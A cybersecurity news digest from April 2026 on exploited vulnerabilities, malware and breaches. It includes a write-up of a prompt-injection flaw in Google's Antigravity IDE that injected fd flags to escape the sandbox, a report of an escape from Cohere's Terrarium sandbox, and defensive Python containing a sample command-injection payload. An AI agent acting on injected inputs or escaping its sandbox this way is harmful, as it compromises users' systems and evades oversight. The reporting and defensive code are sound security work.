
News Summary

Last updated: 08:31 22/04/2026 UTC
  • Multi-Signal Fraud Prevention Strategies Reducing Friction in Customer Journeys
    Modern fraud prevention platforms are shifting toward silent, multi-signal risk scoring systems that evaluate dozens of contextual indicators in real time to block fraudulent activity without imposing additional friction on legitimate users. These systems analyze behavioral, network, and identity signals across the entire customer journey—signup, login, and checkout—to identify and mitigate risks at early stages, including account takeovers, synthetic identities, and payment fraud. The approach leverages enriched telemetry from email, phone, device, IP, and payment data to generate composite risk scores, enabling proportional, targeted responses such as lightweight verification for high-risk sessions rather than blanket blocking or intrusive authentication steps.
Last updated: 08:00 22/04/2026 UTC
  • Unauthenticated RCE Vulnerability in Apache ActiveMQ Classic via Jolokia API (CVE-2026-34197)
    CVE-2026-34197, an unauthenticated RCE vulnerability in Apache ActiveMQ Classic via the Jolokia API, remains actively exploited, with at least 6,400 exposed servers still vulnerable. The flaw affects versions prior to 5.19.4 and 6.0.0 to 6.2.3, with patched releases issued on March 30, 2026. Discovered by Horizon3’s Naveen Sunkavally using AI assistance, the vulnerability chain enables attackers to execute arbitrary OS commands by abusing the Jolokia API’s addNetworkConnector function. CISA added the flaw to its Known Exploited Vulnerabilities Catalog on April 16, 2026, and ordered FCEB agencies to remediate by April 30, 2026 under BOD 22-01. Exploitation indicators include broker logs showing vm:// transport connections with brokerConfig=xbean:http:// query parameters and configuration warnings. Shadowserver reports over 7,500 exposed ActiveMQ servers, with recent data showing 6,400 still vulnerable, concentrated in Asia, North America, and Europe.
  • Salesforce misconfiguration leads to non-sensitive data exposure at McGraw-Hill amid ShinyHunters extortion claims
    McGraw-Hill confirmed a data breach affecting 13.5 million user accounts after ShinyHunters exploited a Salesforce environment misconfiguration to steal and leak non-sensitive data, including names, addresses, phone numbers, and email addresses. The company stated the breach did not impact its core Salesforce accounts, customer databases, courseware, or internal systems, though ShinyHunters claimed possession of 45 million records with PII. The affected webpages were secured promptly, and McGraw-Hill is collaborating with Salesforce to remediate the issue. Have I Been Pwned verified the leak of over 100GB of data tied to 13.5 million accounts. The incident remains distinct from a separate, unverified claim by a threat actor posing as ShinyHunters, who alleges breaching Vercel and selling stolen data, including API keys and employee records. Vercel has disclosed the incident and is investigating with law enforcement and incident response experts, while denying any impact to services.
  • RapperBot Botnet Administrator Charged in the U.S.
    The RapperBot botnet, operated by Ethan Foltz, has been disrupted as part of the broader international Operation PowerOFF, which has now identified over 75,000 DDoS-for-hire users and taken down 53 domains across 21 countries. The operation, supported by Europol, has arrested four individuals, dismantled illegal booter services, and is transitioning into a prevention phase to curb future misuse. RapperBot has been responsible for over 370,000 DDoS attacks on victims in over 80 countries since 2021, primarily targeting U.S. government systems, major media platforms, gaming companies, and large tech firms. The botnet, also known as Eleven Eleven Botnet and CowBot, infected DVRs and Wi-Fi routers to launch attacks and mine Monero. Foltz was charged with aiding and abetting computer intrusions, and the botnet’s command-and-control infrastructure was seized in August 2025. The botnet added a cryptomining module in 2023 and conducted attacks ranging from several terabits per second to over 1 billion packets per second, with the largest exceeding 6 Tbps. Operation PowerOFF’s latest actions build on prior phases that dismantled key infrastructure and seized databases with over 3 million criminal accounts.
  • Pre-authenticated RCE in Marimo exploited within 10 hours of advisory
    A pre-authenticated remote code execution (RCE) vulnerability in Marimo, tracked as CVE-2026-39987 (CVSS 9.3), was exploited in the wild within hours of public disclosure, enabling attackers to gain full PTY shells on exposed instances via the unauthenticated /terminal/ws WebSocket endpoint. The flaw, affecting Marimo versions prior to 0.23.0, initially led to rapid, human-driven exploitation campaigns focused on credential theft. Recent attacks have expanded to deploy a new NKAbuse malware variant hosted on Hugging Face Spaces, using typosquatted repositories to evade detection and establish persistent remote access. Additional exploitation activity includes sophisticated lateral movement, such as reverse-shell techniques and database enumeration, indicating a shift toward multi-stage attacks beyond initial credential harvesting. Threat actors validated the vulnerability within seconds, harvested credentials in under three minutes, and conducted reconnaissance from 125 IP addresses within the first 12 hours post-disclosure. GitHub assessed the flaw with a critical CVSS score of 9.3, and Marimo developers confirmed impact on instances deployed as editable notebooks or exposed via --host 0.0.0.0 in edit mode.
  • Phishing Campaign Abuses iCloud Calendar to Send Emails from Apple Servers
    A phishing campaign continues to abuse Apple’s legitimate infrastructure to deliver callback phishing emails, now exploiting Apple account change notifications to embed fake purchase alerts. Scammers insert phishing text into Apple ID personal information fields, which Apple includes in security alerts sent to users. The emails originate from Apple’s servers ([email protected]), pass SPF, DKIM, and DMARC checks, and are distributed via Apple’s mailing infrastructure, bypassing spam filters and increasing their apparent legitimacy. The emails mimic iPhone purchase notifications via PayPal, claiming charges of $899, and prompt recipients to call a provided number to cancel the transaction. These scams aim to trick victims into granting remote access to their computers, enabling theft of funds, deployment of malware, or data theft. The campaign represents an evolution of prior tactics that abused iCloud Calendar invites to send phishing emails from Apple’s servers. Users are advised to treat unexpected account alerts—especially those claiming unauthorized purchases or urging calls to support numbers—with caution, particularly if they did not initiate recent changes.

Latest updates


Microsoft Graph API regression disrupts Universal Print share creation via race condition

First: 22.04.2026 13:15 · 📰 1 src / 1 article

Microsoft has identified a regression in the Microsoft Graph API as the root cause of intermittent failures in Universal Print printer share creation, affecting Microsoft 365 customers using the cloud-based print management service. The issue, tracked as UP1287359, triggers "Sharing Print Failed" errors when users attempt to create printer shares with the "Allow all users in my organization" toggle enabled or when specific users or groups are selected. The underlying cause is a code change in Graph API that increased Entra ID directory replication latency, exposing a pre-existing race condition in the share creation flow. This disrupts retry logic, preventing share operations from completing as expected.

ProxySmart platform identified as core infrastructure for large-scale SIM farm operations worldwide

First: 22.04.2026 13:00 · 📰 1 src / 1 article

A Belarus-based software platform named ProxySmart has been identified as the operational backbone for over 90 SIM farms across 17 countries, enabling large-scale cybercrime and evasion activities. The end-to-end platform supports device management, automated IP rotation via cellular reconnection, remote control, and network fingerprint spoofing, marketed as a turnkey ‘SIM Farm as a Service’ solution accessible to non-technical operators. The infrastructure is used to facilitate activities including smishing, premium-rate fraud, bot sign-ups, OTP interception, and potential nation-state disinformation campaigns.

Linux GoGra backdoor leverages Microsoft Graph API for covert C2 via Outlook mailbox

First: 22.04.2026 13:00 · 📰 1 src / 1 article

A previously undocumented Linux variant of the GoGra backdoor, attributed to the state-backed Harvester espionage group, has been identified using legitimate Microsoft Graph API and Outlook mailboxes for stealthy command-and-control (C2) communications. The malware is delivered via fraudulent ELF executables masquerading as PDF files, establishes persistence via systemd and XDG autostart under the guise of the Conky system monitor, and retrieves base64-encoded, AES-CBC encrypted commands from a specific Outlook folder named “Zomato Pizza” with subject lines prefixed “Input.” Execution results are similarly encrypted and returned to the operator via reply emails labeled “Output,” with original command emails deleted to reduce forensic traces. The campaign targets telecommunications, government, and IT organizations in South Asia, indicating an expansion of Harvester’s operational scope and toolset to include Linux systems.

Escalating Nation-State Cyber Threat Landscape in the UK Amid Rapid AI Adoption

First: 22.04.2026 11:07 · 📰 1 src / 1 article

The UK faces a sustained and evolving cyber threat environment characterized by nation-state espionage, hybrid operations, and disruptive campaigns as AI-driven technological advancements exacerbate attack surfaces. Richard Horne, CEO of the NCSC, warned at CYBERUK 2026 that geopolitical tensions and rapid AI adoption are converging to create a ‘perfect storm’ of cyber risk. Nation-state actors—particularly China, Russia, and Iran—are employing increasingly sophisticated tactics, with China’s operations noted for their stealth and focus on edge infrastructure such as routers and VPNs. Russian threat activity is becoming more disciplined and militarized, while Iran is using cyber means to target British individuals perceived as regime threats, including via social media and destructive operations like the March 2025 Handala wiper attack on a UK NHS supplier. Despite a steady volume of nationally significant incidents, UK organizations are deemed underprepared due to budget constraints, immature security controls, and limited visibility, raising concerns about resilience against sustained state-sponsored assaults.

Chinese State-Sponsored Group Exploits Windows Zero-Day in Espionage Campaign Against European Diplomats

Updated: 22.04.2026 10:58 · First: 31.10.2025 13:29 · 📰 7 src / 8 articles

A China-linked hacking group, UNC6384 (Mustang Panda), is exploiting a Windows zero-day vulnerability (CVE-2025-9491) to target European diplomats in Hungary, Belgium, Italy, the Netherlands, and Serbian government agencies. The campaign involves spearphishing emails with malicious LNK files to deploy the PlugX RAT and gain persistence on compromised systems. The attacks have broadened in scope to include diplomatic entities from Italy and the Netherlands. The zero-day vulnerability allows for remote code execution on targeted Windows systems, enabling the group to monitor diplomatic communications and steal sensitive data. Microsoft has not yet released a patch for this vulnerability, which has been heavily exploited by multiple state-sponsored groups and cybercrime gangs since March 2025. Microsoft has silently mitigated the vulnerability by changing LNK files in the November updates to display all characters in the Target field, not just the first 260. ACROS Security has also released an unofficial patch to limit shortcut target strings to 260 characters and warn users about potential dangers. Security researcher Wietze Beukema disclosed multiple vulnerabilities in Windows LNK shortcut files that allow attackers to deploy malicious payloads. Beukema documented four previously unknown techniques for manipulating Windows LNK shortcut files to hide malicious targets from users inspecting file properties. The most effective variants use forbidden Windows path characters, such as double quotes, to create seemingly valid but technically invalid paths, causing Explorer to display one target while executing another. The most powerful technique identified involves manipulating the EnvironmentVariableDataBlock structure within LNK files to display a fake target in the properties window while actually executing PowerShell or other malicious commands. 
Microsoft declined to classify the EnvironmentVariableDataBlock issue as a security vulnerability, arguing that exploitation requires user interaction and does not breach security boundaries. Microsoft Defender has detections in place to identify and block this threat activity, and Smart App Control provides an additional layer of protection by blocking malicious files from the Internet. Beukema released "lnk-it-up," an open-source tool suite that generates Windows LNK shortcuts using these techniques for testing and can identify potentially malicious LNK files by predicting what Explorer displays versus what actually executes. CVE-2025-9491 was widely exploited by at least 11 state-sponsored groups and cybercrime gangs. Mustang Panda has expanded operations with a new LOTUSLITE backdoor variant targeting India's banking sector and South Korean/U.S. policy circles. The variant uses CHM files embedding malicious payloads, dynamic DNS C2 servers, and DLL side-loading to deliver remote shell access, file operations, and session management capabilities for espionage purposes.

Root-level sandbox escape in Cohere AI Terrarium via JavaScript prototype chain traversal

First: 22.04.2026 10:16 · 📰 1 src / 1 article

A critical sandbox escape vulnerability (CVE-2026-5752, CVSS 9.3) in Cohere AI’s Terrarium Python sandbox allows arbitrary code execution with root privileges on the host process through JavaScript prototype chain traversal in the Pyodide WebAssembly environment. Terrarium, a Docker-deployed sandbox for untrusted Python code, enables users to submit or generate code via LLMs and runs on Pyodide, supporting standard Python packages. Successful exploitation breaks out of the sandbox to execute system commands as root within the container, access sensitive files such as /etc/passwd, interact with other services on the container network, and potentially escape the container to escalate privileges. The flaw requires local access but no user interaction or special privileges, and no patch is expected as the project is no longer maintained.

Unpatched Microsoft SharePoint servers remain exposed to CVE-2026-32201 spoofing attacks

First: 22.04.2026 09:53 · 📰 1 src / 1 article

Over 1,300 Microsoft SharePoint servers remain unpatched against CVE-2026-32201, a spoofing vulnerability exploited as a zero-day and still actively abused in attacks. The flaw impacts SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition, enabling threat actors without privileges to perform network spoofing via improper input validation. Exploitation can compromise confidentiality and integrity but does not restrict resource access. The issue was patched in April 2026 Patch Tuesday, added to CISA’s Known Exploited Vulnerabilities Catalog, and mandated for patching by U.S. federal agencies within two weeks. Fewer than 200 systems have been updated since the patch release.

Breach at French ANTS exposes citizen data; 19 million records advertised for sale

First: 22.04.2026 00:46 · 📰 1 src / 1 article

France Titres (Agence nationale des titres sécurisés, ANTS), the government agency under France’s Ministry of the Interior responsible for issuing identity documents, disclosed a security incident on April 15, 2026, affecting its ants.gouv.fr portal. An unidentified threat actor advertised a sale of up to 19 million records on April 16, claiming access to full names, contact details, birth data, home addresses, account metadata, and civil status information. ANTS confirmed exposure of login IDs, names, emails, dates of birth, unique account identifiers, and partial address and phone data for an undisclosed number of individuals. While ANTS states the incident does not enable unauthorized access to its portals, exposed data heightens phishing and social engineering risks. The agency is coordinating with CNIL, the Paris Public Prosecutor, and ANSSI and has advised vigilance against suspicious communications purportedly from ANTS.

Microsoft Defender zero-day exploits RedSun, BlueHammer, and UnDefend actively abused in the wild

Updated: 21.04.2026 22:12 · First: 16.04.2026 23:19 · 📰 2 src / 2 articles

Microsoft Defender is being actively abused in the wild using three proof-of-concept exploits—RedSun, BlueHammer (CVE-2026-33825), and UnDefend—released by researcher "Nightmare-Eclipse" after alleged poor responses from Microsoft Security Response Center (MSRC). RedSun and BlueHammer enable SYSTEM-level privilege escalation on fully patched Windows 10, 11, and Server 2019+ systems with Defender enabled, while UnDefend degrades Defender’s threat detection capabilities without triggering alerts. Attackers are staging binaries in low-noise directories and manually enumerating privileges before exploitation, reflecting targeted hands-on intrusions. Microsoft patched BlueHammer in April updates but has not addressed RedSun or UnDefend, which operate via separate flaws in Defender’s privileged file handling workflows.

Lotus data wiper deployed against Venezuelan energy and utility infrastructure in late 2025

First: 21.04.2026 21:38 · 📰 1 src / 1 article

A previously undocumented data-wiping malware named Lotus was deployed in late 2025 against energy and utilities organizations in Venezuela, including a cyberattack on state-owned oil company Petróleos de Venezuela (PDVSA) around mid-December 2025 that disabled delivery systems. The malware systematically erases recovery options and overwrites physical drives, leaving systems unrecoverable. Initial access and lateral movement are facilitated by two batch scripts that disable security services, enumerate accounts, disrupt network connectivity, and prepare the environment for the final payload. The wiper operates at the disk level using IOCTL calls, ensuring comprehensive destruction of data and system state.

SystemBC botnet expansion linked to The Gentlemen RaaS operation

First: 21.04.2026 21:18 · 📰 1 src / 1 article

A command-and-control (C2) server tied to the SystemBC proxy malware was found to control a botnet of over 1,570 compromised hosts, many of which are linked to The Gentlemen ransomware-as-a-service (RaaS) operation active since July 2025. SystemBC establishes encrypted SOCKS5 tunnels for remote access and can deliver additional payloads via disk or memory injection. The botnet spans multiple regions and targets across various operating systems, including Windows, Linux, NAS, and BSD, with affiliates deploying SystemBC during post-compromise phases alongside Cobalt Strike. Initial access vectors remain unclear, but likely involve internet-facing services or compromised credentials, followed by lateral movement, domain-wide compromise via Group Policy Objects (GPOs), and ransomware deployment. The discovery underscores a rapidly growing footprint for The Gentlemen, with reported victim counts exceeding public leak site claims and indicating a broader operational scale than previously documented.

PhantomCard Android Trojan Targets Brazilian Banking Customers via NFC Relay Attacks

Updated: 21.04.2026 19:00 · First: 14.08.2025 14:06 · 📰 3 src / 3 articles

A new variant of the NGate malware family is leveraging a trojanized version of the HandyPay NFC relay app to capture payment card data and PINs from Brazilian Android users since November 2025. The malicious HandyPay app is distributed via phishing domains impersonating a Brazilian lottery site and a Google Play listing for a card protection tool. Once installed, the app relays NFC payment card data to attacker-controlled devices, enabling fraudulent contactless transactions and ATM withdrawals. Unlike earlier NGate variants that relied on open-source tools like NFCGate, this campaign uses a modified version of HandyPay to avoid detection and requires minimal permissions beyond default payment app status. PhantomCard and related NFC relay malware families have expanded their tactics in Brazil, with NGate variants now using trojanized HandyPay to exfiltrate stolen NFC data to attacker-controlled email addresses. The malware is distributed via fake apps like 'Proteção Cartão' on fake Google Play pages and through fake lottery scams via WhatsApp. ESET researchers attribute the shift from NFCGate to HandyPay to cost and evasion benefits, as HandyPay is significantly cheaper and does not require special permissions. Evidence suggests the malicious code may have been partially generated using generative AI tools, indicated by emoji markers in debug logs.

British Scattered Spider leader Tyler Buchanan pleads guilty; group’s fraud campaigns escalate to $8M cryptocurrency theft and multiple prosecutions

Updated: 21.04.2026 17:53 · First: 21.08.2025 11:34 · 📰 6 src / 9 articles

Tyler Robert Buchanan, a 24-year-old British leader of the Scattered Spider cybercrime collective, pleaded guilty in the United States to wire fraud conspiracy and aggravated identity theft. Buchanan admitted orchestrating tens of thousands of SMS phishing attacks in 2022 that breached at least a dozen major technology companies—including Twilio, LastPass, DoorDash, and Mailchimp—enabling SIM-swapping attacks that stole at least $8 million in cryptocurrency from individual investors. Buchanan used the alias "Tylerb" and previously ranked #65 on a Telegram leaderboard of prolific SIM-swappers. Buchanan fled the U.K. in February 2023 after a rival gang invaded his home, assaulted his mother, and threatened him with a blowtorch to extort cryptocurrency wallet keys; U.K. investigators later seized a device from his Scotland residence containing stolen data and cryptocurrency seed phrases. Arrested in June 2024 in Palma de Mallorca and extradited to the U.S. in April 2025, Buchanan is scheduled for sentencing on August 21, 2026, facing up to 22 years in prison with potential sentence reductions due to mitigating factors such as his age and cooperation. His case follows the 10-year sentence of key member Noah Michael Urban in 2025 and precedes the upcoming trials of Owen Flowers and Thalha Jubair in the U.K. Scattered Spider continues to operate via Telegram and Discord under the "the Com" umbrella, relying on social engineering, phishing, MFA bombing, and SIM swapping to target organizations across sectors.

Ransomware extortion totals $2.1B from 2022 to 2024, FinCEN reports

Updated: 21.04.2026 17:31 · First: 08.12.2025 23:07 · 📰 3 src / 4 articles

FinCEN's report reveals that ransomware gangs extorted over $2.1 billion from 2022 to 2024, with a peak in 2023 followed by a decline in 2024 due to law enforcement actions against major gangs like ALPHV/BlackCat and LockBit. The report details 4,194 ransomware incidents, with manufacturing, financial services, and healthcare being the most targeted industries. The top ransomware families, including Akira, ALPHV/BlackCat, and LockBit, were responsible for the majority of attacks and ransom payments, with Bitcoin being the primary payment method. A former ransomware negotiator, Angelo Martino, has pleaded guilty to conspiring with BlackCat (ALPHV) operators to extort U.S. companies in 2023. Martino, along with accomplices Kevin Tyler Martin and Ryan Goldberg, deployed BlackCat ransomware, shared confidential victim information to maximize ransom demands, and laundered illicit proceeds. Authorities seized $10 million in assets from Martino, and his co-defendants pleaded guilty in December 2025.

Malicious Ledger Live macOS app on Apple App Store facilitates $9.5M crypto theft via seed phrase harvesting

Updated: 21.04.2026 17:05 · First: 14.04.2026 19:37 · 📰 3 src / 3 articles

A fraudulent Ledger Live macOS application, distributed through Apple's App Store under the publisher name 'Leva Heal Limited,' compromised approximately 50 users between April 8 and 11, 2026, resulting in the theft of $9.5 million in cryptocurrency. The app tricked users into entering their seed phrases, giving attackers full wallet control and letting them transfer funds to attacker-controlled addresses. The incident is part of a broader App Store infiltration campaign dubbed FakeWallet, linked to the SparkKitty operation and active since at least fall 2025. Kaspersky identified 26 malicious apps impersonating major wallets (e.g., Ledger, MetaMask, Coinbase) to steal seed phrases and drain assets, with the malicious functionality delivered through bundled libraries or injected code. Some apps carried latent malicious features awaiting later activation, and the campaign's modules had no regional restrictions despite initially targeting Chinese-speaking users. Apple began removing the malicious apps after Kaspersky's disclosure, and implicated KuCoin accounts were frozen until April 20, 2026.

Multi-Signal Fraud Prevention Strategies Reducing Friction in Customer Journeys

Updated: · First: 21.04.2026 17:02 · 📰 1 src / 1 articles

Modern fraud prevention platforms are shifting toward silent, multi-signal risk scoring systems that evaluate dozens of contextual indicators in real time to block fraudulent activity without imposing additional friction on legitimate users. These systems analyze behavioral, network, and identity signals across the entire customer journey—signup, login, and checkout—to identify and mitigate risks at early stages, including account takeovers, synthetic identities, and payment fraud. The approach leverages enriched telemetry from email, phone, device, IP, and payment data to generate composite risk scores, enabling proportional, targeted responses such as lightweight verification for high-risk sessions rather than blanket blocking or intrusive authentication steps.

Cross-Platform Enterprise Encryption by The Gentlemen Ransomware Operation

Updated: · First: 21.04.2026 17:00 · 📰 1 src / 1 articles

A rapidly expanding ransomware-as-a-service operation named The Gentlemen has compromised over 320 organizations, most of them in early 2026, using modular cross-platform payloads and affiliate-driven intrusion techniques. The group targets enterprise environments across Windows, Linux, NAS, BSD and ESXi systems with ransomware variants written in Go and C, and supplies its affiliates with lateral movement, credential harvesting and Group Policy-based deployment capabilities. Impact includes domain-wide encryption, process termination to hinder recovery, shadow copy deletion, and use of the SystemBC proxy malware for covert command-and-control; over 1,570 infected systems have been detected globally, concentrated in the US, UK and Germany.

UK regulator initiates compliance investigations into Telegram, teen chat platforms, and X over CSAM and nonconsensual content risks

Updated: · First: 21.04.2026 16:49 · 📰 1 src / 1 articles

The UK's communications regulator, Ofcom, has opened formal investigations under the Online Safety Act into Telegram, two teen chat platforms (Teen Chat and Chat Avenue), and X (formerly Twitter). The probes assess potential failures to prevent the sharing of child sexual abuse material (CSAM) on Telegram and child grooming risks on the teen chat sites, while X is scrutinized over nonconsensual sexually explicit content generated by its Grok AI chatbot. Telegram disputes the allegations, saying it has "virtually eliminated" public CSAM sharing since 2018 and arguing that its privacy-focused measures have made it a target of broader regulatory scrutiny. Ofcom's actions follow evidence from the Canadian Centre for Child Protection and its own assessments; potential enforcement ranges from fines of up to £18 million or 10% of global revenue to court-ordered access restrictions or business disruption measures against non-compliant platforms in the UK.

Unchecked AI Agent Deployments Drive Widespread Cybersecurity Incidents Across Enterprises

Updated: · First: 21.04.2026 16:00 · 📰 1 src / 1 articles

Two-thirds of organizations experienced cybersecurity incidents linked to unchecked AI agent deployments within the past year, with data exposure, operational disruption, and financial losses reported. Despite high confidence in visibility, 82% of organizations discovered previously unknown AI agents—often in internal automation and LLM platforms—highlighting governance gaps. The absence of formal decommissioning processes exacerbates risks, as dormant agents retain credentials and permissions, enabling unintended data leaks or breaches.

Threat intelligence integration in SOC workflows reduces MTTR by eliminating manual handoffs

Updated: · First: 21.04.2026 16:00 · 📰 1 src / 1 articles

Mature SOCs achieve significantly faster Mean Time to Respond (MTTR) by embedding threat intelligence directly into workflows, eliminating manual lookups and tool-switching that traditionally delay incident handling. Structural inefficiencies in detection, triage, investigation, response, and threat hunting—such as fragmented intelligence feeds, siloed reports, and separate enrichment processes—create cumulative delays that inflate MTTR. By integrating real-time behavioral context and contextualized threat data (e.g., from ANY.RUN’s threat intelligence feeds, lookup, and reports) directly into detection, triage, and response tools, organizations reduce dwell time, accelerate decision-making, and improve containment speed. The shift transforms reactive firefighting into proactive risk management, lowering operational disruption, regulatory exposure, and data exfiltration risk.

Mustang Panda campaigns target Indian banking sector with LotusLite backdoor

Updated: · First: 21.04.2026 15:00 · 📰 1 src / 1 articles

Chinese state-sponsored APT Mustang Panda (aka TA416, Bronze President, Stately Taurus) has been observed running espionage campaigns against India's banking sector, American and Korean policy circles, and financial organizations using a newly identified variant of the LotusLite backdoor. For Indian targets the actor sent spear-phishing emails mimicking IT help desk issues; for policy targets it used a fake Google account impersonating political scientist Victor Cha. Both lures delivered a DLL side-loading chain that established persistence via the Windows Registry and then deployed LotusLite, a backdoor family associated with Mustang Panda that provides remote shell access, file exfiltration, and other espionage capabilities. The campaign relies on routine, low-complexity TTPs despite targeting high-value financial infrastructure, with malware disguised as regional banking software (e.g., HDFC Bank) and only minor evasion tweaks to LotusLite.

Unauthenticated RCE Vulnerability in Apache ActiveMQ Classic via Jolokia API (CVE-2026-34197)

Updated: 21.04.2026 14:17 · First: 08.04.2026 12:15 · 📰 4 src / 4 articles

CVE-2026-34197, an unauthenticated RCE vulnerability in Apache ActiveMQ Classic reachable through the Jolokia API, remains under active exploitation. The flaw affects versions prior to 5.19.4 and versions 6.0.0 through 6.2.3; patched releases were issued on March 30, 2026. Discovered by Horizon3's Naveen Sunkavally with AI assistance, the vulnerability chain lets attackers execute arbitrary OS commands by abusing the Jolokia API's addNetworkConnector operation. CISA added the flaw to its Known Exploited Vulnerabilities Catalog on April 16, 2026, and ordered FCEB agencies to remediate by April 30, 2026 under BOD 22-01. Exploitation indicators include broker logs showing vm:// transport connections carrying brokerConfig=xbean:http:// query parameters, along with configuration warnings. Shadowserver reports over 7,500 exposed ActiveMQ servers, of which roughly 6,400 remain vulnerable, concentrated in Asia, North America, and Europe.
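As an added example (not code from the sources summarized here), the following Python scans ActiveMQ Classic broker logs for the two indicators the summary describes, a vm:// transport URI carrying brokerConfig=xbean:http:// and an addNetworkConnector invocation, and checks a broker version string against the affected ranges. The log lines are constructed to resemble ActiveMQ's default log layout; real brokers may format them differently, so the matcher keys only on the URI parameter and the operation name. The hit labels and the Jolokia-style line are assumptions, not ActiveMQ output.

```python
import re
from dataclasses import dataclass

# Constructed sample of ActiveMQ Classic broker log lines (not real data).
# Lines 1-3 are routine; line 4 carries the vm://...brokerConfig=xbean:http://
# indicator and line 5 an addNetworkConnector invocation through Jolokia.
SAMPLE_LOG = """\
2026-04-09 10:14:02,113 | INFO  | Apache ActiveMQ 5.18.3 (localhost, ID:broker-1) is starting | org.apache.activemq.broker.BrokerService | main
2026-04-09 10:14:03,420 | INFO  | Connector openwire started | org.apache.activemq.broker.TransportConnector | main
2026-04-09 11:02:47,009 | INFO  | Establishing network connection from vm://localhost?async=false&network=true to tcp://10.0.0.12:61616 | org.apache.activemq.network.DiscoveryNetworkConnector | ActiveMQ Task-1
2026-04-09 11:05:31,551 | WARN  | Could not start network bridge between: vm://localhost?brokerConfig=xbean:http://203.0.113.5:8000/config.xml and: tcp://127.0.0.1:61616 due to: java.io.IOException | org.apache.activemq.network.DiscoveryNetworkConnector | ActiveMQ Task-2
2026-04-09 11:05:31,560 | INFO  | Jolokia exec on org.apache.activemq:type=Broker,brokerName=localhost operation addNetworkConnector | org.jolokia.http.AgentServlet | qtp-17
"""

# Indicator 1: a vm:// transport URI whose brokerConfig parameter points the
# broker at an xbean XML configuration fetched over HTTP(S). Nothing legitimate
# asks a broker to load its configuration from a remote URL via Jolokia.
VM_XBEAN_RE = re.compile(
    r"vm://[^\s\"']*[?&]brokerConfig=xbean:(https?://[^\s\"'&]+)", re.IGNORECASE
)
# Indicator 2: the addNetworkConnector operation the summary names as the abused
# Jolokia entry point (match it in broker logs or Jolokia/HTTP access logs).
ADD_NC_RE = re.compile(r"addNetworkConnector", re.IGNORECASE)


@dataclass
class Hit:
    line_no: int
    indicator: str
    detail: str


def scan_log(text: str) -> list:
    """Return one Hit per log line that matches an exploitation indicator."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = VM_XBEAN_RE.search(line)
        if m:
            hits.append(Hit(n, "vm-xbean-remote-config", m.group(1)))
        elif ADD_NC_RE.search(line):
            hits.append(Hit(n, "jolokia-addNetworkConnector", line.strip()))
    return hits


def parse_version(version: str) -> tuple:
    """'5.18.3' -> (5, 18, 3); tolerates suffixes such as '5.18.3-SNAPSHOT'."""
    nums = [int(x) for x in re.findall(r"\d+", version)[:3]]
    if not nums:
        raise ValueError(f"unparseable version: {version!r}")
    while len(nums) < 3:
        nums.append(0)
    return tuple(nums)


def is_vulnerable(version: str) -> bool:
    """Affected ranges from the summary: below 5.19.4, and 6.0.0 through 6.2.3."""
    v = parse_version(version)
    return v < (5, 19, 4) or (6, 0, 0) <= v <= (6, 2, 3)


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"line {h.line_no}: {h.indicator}: {h.detail}")
    for ver in ("5.18.3", "5.19.4", "6.2.3", "6.2.4"):
        print(ver, "VULNERABLE" if is_vulnerable(ver) else "patched")
```

A clean log is not proof of non-exploitation (an attacker who reached OS command execution can truncate it), so treat the version check as authoritative, and also confirm whether the Jolokia endpoint answers unauthenticated requests from the network at all.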

Antigravity IDE prompt injection flaw leads to sandbox escape and RCE in Google’s agentic development environment

Updated: · First: 21.04.2026 13:52 · 📰 1 src / 1 articles

A critical prompt injection vulnerability in Antigravity, Google's agentic integrated development environment (IDE), allowed attackers to achieve remote code execution (RCE) and sandbox escape, as demonstrated by a proof-of-concept (PoC) attack. The flaw, discovered by Pillar Security, exploited insufficient input sanitization in the IDE's file-search tool (find_by_name): a search term could inject command-line flags into the underlying fd utility, turning a legitimate search into arbitrary code execution. The attack bypassed Antigravity's Secure Mode, which is designed to restrict network access, prevent writes outside the workspace, and sandbox command execution, because the vulnerable tool call ran before those controls were enforced. Google patched the flaw in February 2026 after receiving the report in January 2026. The case illustrates a persistent risk in agentic IDEs: tool-execution primitives with weak input validation can be weaponized through prompt injection, yielding full system compromise without further user interaction.
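As an added example (not Pillar Security's PoC or Antigravity's code), the Python below reconstructs the class of bug in simplified form: a builder that shell-splits a model-supplied search term into the fd argv, beside a builder that passes the term as a single element after the -- end-of-options marker. The function names, the tool shape and the payload string are assumptions; the only facts taken from the summary are that the search term reached fd's command line and that fd accepts an -x/--exec option. That fd honours -- is standard behaviour for its clap-based option parser, but verify it against the installed version before relying on it.

```python
import shlex
import shutil
import subprocess

FD = "fd"  # the file-search binary the tool shells out to

# Constructed payload: a "search term" that is really fd options. -x/--exec
# makes fd run the given command once for every matching file.
INJECTED_TERM = "-x sh -c 'id > /tmp/pwned'"


def build_fd_argv_vulnerable(name: str, root: str = ".") -> list:
    """Hypothetical vulnerable builder (not Antigravity's code): the model-
    supplied term is shell-split and spliced straight into argv, so a term
    beginning with '-' is parsed by fd as options rather than as a pattern."""
    return [FD, *shlex.split(name), root]


def build_fd_argv_hardened(name: str, root: str = ".") -> list:
    """Hardened builder: the term is exactly one argv element and sits after
    '--', the end-of-options marker, so the option parser never sees it.
    Model output is never split, quoted, or passed through a shell."""
    if not name:
        raise ValueError("empty search term")
    return [FD, "--", name, root]


def options_parsed_by_fd(argv: list) -> list:
    """Which argv elements an option parser would treat as options: the
    dash-prefixed elements that appear before the '--' marker."""
    opts = []
    for arg in argv[1:]:
        if arg == "--":
            break
        if arg.startswith("-"):
            opts.append(arg)
    return opts


def run_fd(argv: list):
    """Execute an argv list without a shell; returns None if fd is not installed."""
    if shutil.which(FD) is None:
        return None
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=30)
    return proc.stdout.splitlines()


if __name__ == "__main__":
    vuln = build_fd_argv_vulnerable(INJECTED_TERM)
    safe = build_fd_argv_hardened(INJECTED_TERM)
    print("vulnerable argv:", vuln, "-> options fd would parse:", options_parsed_by_fd(vuln))
    print("hardened argv:  ", safe, "-> options fd would parse:", options_parsed_by_fd(safe))
    # Only the hardened form is ever executed here; fd simply reports no match.
    print("hardened run:", run_fd(safe))
```

The hardening lives in the argv builder itself, not in a policy layer that runs later; the summary's point is that the vulnerable call fired before Secure Mode was enforced, so any check that depends on ordering would not have helped. The same rule applies to every tool a coding agent exposes: never split or shell-interpret model output, and place the -- marker before any positional argument the model controls.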

BlackCat ransomware affiliate linked to insider-facilitated extortion operations

Updated: · First: 21.04.2026 13:12 · 📰 1 src / 1 articles

